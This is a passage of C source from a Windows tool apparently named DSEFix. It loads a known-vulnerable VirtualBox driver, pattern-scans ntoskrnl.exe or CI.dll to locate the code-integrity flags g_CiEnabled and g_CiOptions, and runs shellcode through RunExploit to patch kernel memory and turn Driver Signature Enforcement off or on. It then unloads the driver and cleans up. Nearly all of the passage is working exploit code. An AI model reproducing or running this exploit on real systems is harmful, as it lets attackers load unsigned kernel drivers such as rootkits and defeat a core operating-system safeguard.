TRUE); 356 | } 357 | } 358 | 359 | //if vbox installed backup it driver, do it before dropping our 360 | if (g_VBoxInstalled) { 361 | if (supBackupVBoxDrv(FALSE) == FALSE) { 362 | cuiPrintText(g_ConOut, 363 | TEXT("Ldr: Error while doing VirtualBox driver backup"), 364 | g_ConsoleOutput, TRUE); 365 | 366 | break; 367 | } 368 | } 369 | 370 | //drop our vboxdrv version 371 | _strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys")); 372 | bytesIO = (ULONG)supWriteBufferToFile( 373 | szDriverFileName, 374 | DrvBuffer, 375 | (SIZE_T)DataSize); 376 | 377 | if (bytesIO != DataSize) { 378 | 379 | cuiPrintText(g_ConOut, 380 | TEXT("Ldr: Error writing VirtualBox on disk"), 381 | g_ConsoleOutput, TRUE); 382 | 383 | break; 384 | } 385 | 386 | //if vbox not found in system install driver in scm 387 | if (g_VBoxInstalled == FALSE) { 388 | scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName); 389 | } 390 | 391 | //run driver 392 | if (scmStartDriver(schSCManager, VBoxDrvSvc) != FALSE) { 393 | 394 | if (scmOpenDevice(VBoxDrvSvc, &hDevice)) 395 | msg = TEXT("SCM: Vulnerable driver loaded and opened"); 396 | else 397 | msg = TEXT("SCM: Driver device open failure"); 398 | 399 | } 400 | else { 401 | msg = TEXT("SCM: Vulnerable driver load failure"); 402 | } 403 | 404 | cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); 405 | 406 | } while (bCond); 407 | 408 | //post cleanup 409 | if (schSCManager != NULL) { 410 | CloseServiceHandle(schSCManager); 411 | } 412 | return hDevice; 413 | } 414 | 415 | /* 416 | * StopVulnerableDriver 417 | * 418 | * Purpose: 419 | * 420 | * Unload previously loaded vulnerable driver. If VirtualBox installed - restore original driver. 421 | * 422 | */ 423 | void StopVulnerableDriver( 424 | VOID 425 | ) 426 | { 427 | SC_HANDLE schSCManager; 428 | LPWSTR msg; 429 | UNICODE_STRING uStr; 430 | OBJECT_ATTRIBUTES ObjectAttributes; 431 | 432 | cuiPrintText(g_ConOut, 433 | TEXT("SCM: Unloading vulnerable driver"), 434 | g_ConsoleOutput, TRUE); 435 | 436 | if (g_hVBox != INVALID_HANDLE_VALUE) 437 | CloseHandle(g_hVBox); 438 | 439 | schSCManager = OpenSCManager(NULL, 440 | NULL, 441 | SC_MANAGER_ALL_ACCESS 442 | ); 443 | 444 | if (schSCManager == NULL) { 445 | cuiPrintText(g_ConOut, 446 | TEXT("SCM: Cannot open database, unable unload driver"), 447 | g_ConsoleOutput, TRUE); 448 | return; 449 | } 450 | 451 | //stop driver in any case 452 | if (scmStopDriver(schSCManager, VBoxDrvSvc)) 453 | msg = TEXT("SCM: Vulnerable driver successfully unloaded"); 454 | else 455 | msg = TEXT("SCM: Unexpected error while unloading driver"); 456 | 457 | cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); 458 | 459 | //if VBox not installed - remove from scm database and delete file 460 | if (g_VBoxInstalled == FALSE) { 461 | 462 | if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) 463 | msg = TEXT("SCM: Driver entry removed from registry"); 464 | else 465 | msg = TEXT("SCM: Error removing driver entry from registry"); 466 | 467 | cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); 468 | 469 | uStr.Buffer = NULL; 470 | uStr.Length = 0; 471 | uStr.MaximumLength = 0; 472 | RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); 473 | InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); 474 | if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) 475 | msg = TEXT("Ldr: Driver file removed"); 476 | else 477 | msg = TEXT("Ldr: Error removing driver file"); 478 | 479 | cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); 480 | 481 | } 482 | else { 483 | //VBox software present, restore original driver and exit 484 | if (supBackupVBoxDrv(TRUE)) 485 | msg = TEXT("Ldr: Original driver restored"); 486 | else 487 | msg = TEXT("Ldr: Unexpected error while restoring original driver"); 488 | 489 | cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); 490 | } 491 | CloseServiceHandle(schSCManager); 492 | } 493 | 494 | /* 495 | * QueryCiEnabled 496 | * 497 | * Purpose: 498 | * 499 | * Find g_CiEnabled variable address. 500 | * 501 | */ 502 | LONG QueryCiEnabled( 503 | _In_ PVOID MappedBase, 504 | _In_ SIZE_T SizeOfImage, 505 | _Inout_ ULONG_PTR *KernelBase 506 | ) 507 | { 508 | SIZE_T c; 509 | LONG rel = 0; 510 | 511 | for (c = 0; c < SizeOfImage - sizeof(DWORD); c++) { 512 | if (*(PDWORD)((PBYTE)MappedBase + c) == 0x1d8806eb) { 513 | rel = *(PLONG)((PBYTE)MappedBase + c + 4); 514 | *KernelBase = *KernelBase + c + 8 + rel; 515 | break; 516 | } 517 | } 518 | 519 | return rel; 520 | } 521 | 522 | /* 523 | * QueryCiOptions 524 | * 525 | * Purpose: 526 | * 527 | * Find g_CiOptions variable address. 528 | * 529 | */ 530 | LONG QueryCiOptions( 531 | _In_ PVOID MappedBase, 532 | _Inout_ ULONG_PTR *KernelBase 533 | ) 534 | { 535 | PBYTE CiInitialize = NULL; 536 | ULONG c, j = 0; 537 | LONG rel = 0; 538 | hde64s hs; 539 | 540 | CiInitialize = (PBYTE)GetProcAddress(MappedBase, "CiInitialize"); 541 | if (CiInitialize == NULL) 542 | return 0; 543 | 544 | if (g_osv.dwBuildNumber > 16199) { 545 | 546 | c = 0; 547 | j = 0; 548 | do { 549 | 550 | /* call CipInitialize */ 551 | if (CiInitialize[c] == 0xE8) 552 | j++; 553 | 554 | if (j > 1) { 555 | rel = *(PLONG)(CiInitialize + c + 1); 556 | break; 557 | } 558 | 559 | hde64_disasm(CiInitialize + c, &hs); 560 | if (hs.flags & F_ERROR) 561 | break; 562 | c += hs.len; 563 | 564 | } while (c < 256); 565 | 566 | } 567 | else { 568 | 569 | c = 0; 570 | do { 571 | 572 | /* jmp CipInitialize */ 573 | if (CiInitialize[c] == 0xE9) { 574 | rel = *(PLONG)(CiInitialize + c + 1); 575 | break; 576 | } 577 | hde64_disasm(CiInitialize + c, &hs); 578 | if (hs.flags & F_ERROR) 579 | break; 580 | c += hs.len; 581 | 582 | } while (c < 256); 583 | 584 | } 585 | 586 | CiInitialize = CiInitialize + c + 5 + rel; 587 | c = 0; 588 | do { 589 | 590 | if (*(PUSHORT)(CiInitialize + c) == 0x0d89) { 591 | rel = *(PLONG)(CiInitialize + c + 2); 592 | break; 593 | } 594 | hde64_disasm(CiInitialize + c, &hs); 595 | if (hs.flags & F_ERROR) 596 | break; 597 | c += hs.len; 598 | 599 | } while (c < 256); 600 | 601 | CiInitialize = CiInitialize + c + 6 + rel; 602 | 603 | *KernelBase = *KernelBase + CiInitialize - (PBYTE)MappedBase; 604 | 605 | return rel; 606 | } 607 | 608 | /* 609 | * QueryVariableAddress 610 | * 611 | * Purpose: 612 | * 613 | * Find variable address. 614 | * Depending on NT version search in ntoskrnl.exe or ci.dll 615 | * 616 | */ 617 | ULONG_PTR QueryVariableAddress( 618 | VOID 619 | ) 620 | { 621 | LONG rel = 0; 622 | SIZE_T SizeOfImage = 0; 623 | ULONG_PTR Result = 0, ModuleKernelBase = 0; 624 | CHAR *szModuleName; 625 | WCHAR *wszErrorEvent, *wszSuccessEvent; 626 | PVOID MappedBase = NULL; 627 | 628 | CHAR szFullModuleName[MAX_PATH * 2]; 629 | 630 | if (g_osv.dwBuildNumber < 9200) { 631 | szModuleName = NTOSKRNL_EXE; 632 | wszErrorEvent = TEXT("Ldr: ntoskrnl.exe loaded image base not recognized"); 633 | wszSuccessEvent = TEXT("Ldr: ntoskrnl.exe loaded for pattern search"); 634 | } 635 | else { 636 | szModuleName = CI_DLL; 637 | wszErrorEvent = TEXT("Ldr: CI.dll loaded image base not recognized"); 638 | wszSuccessEvent = TEXT("Ldr: CI.dll loaded for pattern search"); 639 | } 640 | 641 | ModuleKernelBase = supGetModuleBaseByName(szModuleName); 642 | if (ModuleKernelBase == 0) { 643 | cuiPrintText(g_ConOut, 644 | wszErrorEvent, 645 | g_ConsoleOutput, TRUE); 646 | return 0; 647 | } 648 | 649 | szFullModuleName[0] = 0; 650 | if (!GetSystemDirectoryA(szFullModuleName, MAX_PATH)) 651 | return 0; 652 | _strcat_a(szFullModuleName, "\\"); 653 | _strcat_a(szFullModuleName, szModuleName); 654 | 655 | MappedBase = LoadLibraryExA(szFullModuleName, NULL, DONT_RESOLVE_DLL_REFERENCES); 656 | if (MappedBase) { 657 | 658 | cuiPrintText(g_ConOut, 659 | wszSuccessEvent, 660 | g_ConsoleOutput, TRUE); 661 | 662 | if (g_osv.dwBuildNumber < 9200) { 663 | rel = QueryCiEnabled( 664 | MappedBase, 665 | SizeOfImage, 666 | &ModuleKernelBase); 667 | 668 | } 669 | else { 670 | rel = QueryCiOptions( 671 | MappedBase, 672 | &ModuleKernelBase); 673 | } 674 | 675 | if (rel != 0) { 676 | Result = ModuleKernelBase; 677 | } 678 | FreeLibrary(MappedBase); 679 | } 680 | else { 681 | 682 | // 683 | // Output error. 684 | // 685 | if (g_osv.dwBuildNumber < 9200) { 686 | wszErrorEvent = TEXT("Ldr: Cannot load ntoskrnl.exe"); 687 | } 688 | else { 689 | wszErrorEvent = TEXT("Ldr: Cannot load CI.dll"); 690 | } 691 | cuiPrintText(g_ConOut, 692 | wszErrorEvent, 693 | g_ConsoleOutput, TRUE); 694 | } 695 | 696 | return Result; 697 | } 698 | 699 | /* 700 | * ProcessCommandLine 701 | * 702 | * Purpose: 703 | * 704 | * Extract input command, select shellcode, patch kernel memory. 705 | * 706 | */ 707 | UINT ProcessCommandLine( 708 | _In_ LPWSTR lpCommandLine 709 | ) 710 | { 711 | BOOLEAN bEnable = FALSE; 712 | UINT retVal = (UINT)-1; 713 | ULONG c, CodeSize; 714 | PVOID CodePtr = NULL; 715 | ULONG_PTR g_CiAddress = 0; 716 | 717 | WCHAR szBuffer[MAX_PATH + 1]; 718 | 719 | // 720 | // Command line options. 721 | // 722 | c = 0; 723 | RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); 724 | GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szBuffer, MAX_PATH, &c); 725 | 726 | // 727 | // Check "enable" command. 728 | // 729 | if (c > 0) { 730 | if (_strcmpi(szBuffer, TEXT("-e")) == 0) { 731 | bEnable = TRUE; 732 | } 733 | } 734 | 735 | g_CiAddress = QueryVariableAddress(); 736 | if (g_CiAddress == 0) { 737 | cuiPrintText(g_ConOut, 738 | TEXT("Ldr: Cannot query address for patch"), 739 | g_ConsoleOutput, TRUE); 740 | return retVal; 741 | } 742 | 743 | // 744 | // Select proper shellcode buffer 745 | // 746 | if (bEnable) { 747 | 748 | cuiPrintText(g_ConOut, 749 | TEXT("Ldr: DSE will be (re)enabled"), 750 | g_ConsoleOutput, TRUE); 751 | 752 | if (g_osv.dwBuildNumber < 9200) { 753 | // 754 | // Shellcode for vista, 7 755 | // 756 | CodePtr = (PVOID)scEnableVista7; 757 | CodeSize = sizeof(scEnableVista7); 758 | } 759 | else { 760 | // 761 | // Shellcode for for 8/10+ 762 | // 763 | CodePtr = (PVOID)scEnable8Plus; 764 | CodeSize = sizeof(scEnable8Plus); 765 | } 766 | } 767 | else { 768 | cuiPrintText(g_ConOut, 769 | TEXT("Ldr: DSE will be disabled"), 770 | g_ConsoleOutput, TRUE); 771 | 772 | CodePtr = (PVOID)scDisable; 773 | CodeSize = sizeof(scDisable); 774 | } 775 | 776 | g_hVBox = StartVulnerableDriver(); 777 | if (g_hVBox != INVALID_HANDLE_VALUE) { 778 | RunExploit(g_CiAddress, CodePtr, CodeSize); 779 | StopVulnerableDriver(); 780 | } 781 | 782 | return retVal; 783 | } 784 | 785 | /* 786 | * DSEFixMain 787 | * 788 | * Purpose: 789 | * 790 | * Program main. 791 | * 792 | */ 793 | void DSEFixMain() 794 | { 795 | BOOL bCond = FALSE; 796 | LONG x; 797 | UINT uResult = 0; 798 | DWORD dwTemp; 799 | WCHAR text[256]; 800 | 801 | __security_init_cookie(); 802 | 803 | do { 804 | g_hInstance = GetModuleHandle(NULL); 805 | g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); 806 | if (g_ConOut == INVALID_HANDLE_VALUE) { 807 | uResult = (UINT)-1; 808 | break; 809 | } 810 | g_ConsoleOutput = TRUE; 811 | if (!GetConsoleMode(g_ConOut, &dwTemp)) { 812 | g_ConsoleOutput = FALSE; 813 | } 814 | SetConsoleTitle(T_PROGRAMTITLE); 815 | SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); 816 | if (g_ConsoleOutput == FALSE) { 817 | WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); 818 | } 819 | 820 | cuiPrintText(g_ConOut, 821 | T_PROGRAMINTRO, 822 | g_ConsoleOutput, TRUE); 823 | 824 | x = InterlockedIncrement((PLONG)&g_lApplicationInstances); 825 | if (x > 1) { 826 | cuiPrintText(g_ConOut, 827 | T_PROGRAMRUN, 828 | g_ConsoleOutput, TRUE); 829 | uResult = (UINT)-1; 830 | break; 831 | } 832 | 833 | //check version first 834 | RtlSecureZeroMemory(&g_osv, sizeof(g_osv)); 835 | g_osv.dwOSVersionInfoSize = sizeof(g_osv); 836 | RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv); 837 | if (g_osv.dwMajorVersion < 6) { 838 | cuiPrintText(g_ConOut, 839 | T_PROGRAMUNSUP, 840 | g_ConsoleOutput, TRUE); 841 | uResult = (UINT)-1; 842 | break; 843 | } 844 | 845 | _strcpy(text, TEXT("Ldr: Windows v")); 846 | ultostr(g_osv.dwMajorVersion, _strend(text)); 847 | _strcat(text, TEXT(".")); 848 | ultostr(g_osv.dwMinorVersion, _strend(text)); 849 | _strcat(text, TEXT(" build ")); 850 | ultostr(g_osv.dwBuildNumber, _strend(text)); 851 | cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); 852 | 853 | if (g_osv.dwBuildNumber > 9200) { 854 | cuiPrintText(g_ConOut, 855 | TEXT("Ldr: Warning, improved PatchGuard version present"), 856 | g_ConsoleOutput, TRUE); 857 | if (g_osv.dwBuildNumber > 10240) { 858 | cuiPrintText(g_ConOut, 859 | TEXT("Ldr: Modification of data region will lead to delayed BSOD"), 860 | g_ConsoleOutput, TRUE); 861 | } 862 | } 863 | 864 | // 865 | // If VirtualBox installed on the same machine warn user, 866 | // however this is unnecessary can lead to any conflicts. 867 | // 868 | g_VBoxInstalled = IsVBoxInstalled(); 869 | if (g_VBoxInstalled) { 870 | cuiPrintText(g_ConOut, 871 | TEXT("Ldr: Warning VirtualBox software installed, conflicts are possible"), 872 | g_ConsoleOutput, TRUE); 873 | } 874 | 875 | uResult = ProcessCommandLine(GetCommandLine()); 876 | 877 | cuiPrintText(g_ConOut, 878 | TEXT("Ldr: Exit"), 879 | g_ConsoleOutput, TRUE); 880 | 881 | } while (bCond); 882 | 883 | InterlockedDecrement((PLONG)&g_lApplicationInstances); 884 | ExitProcess(uResult); 885 | } 886 | --------------------------------------------------------------------------------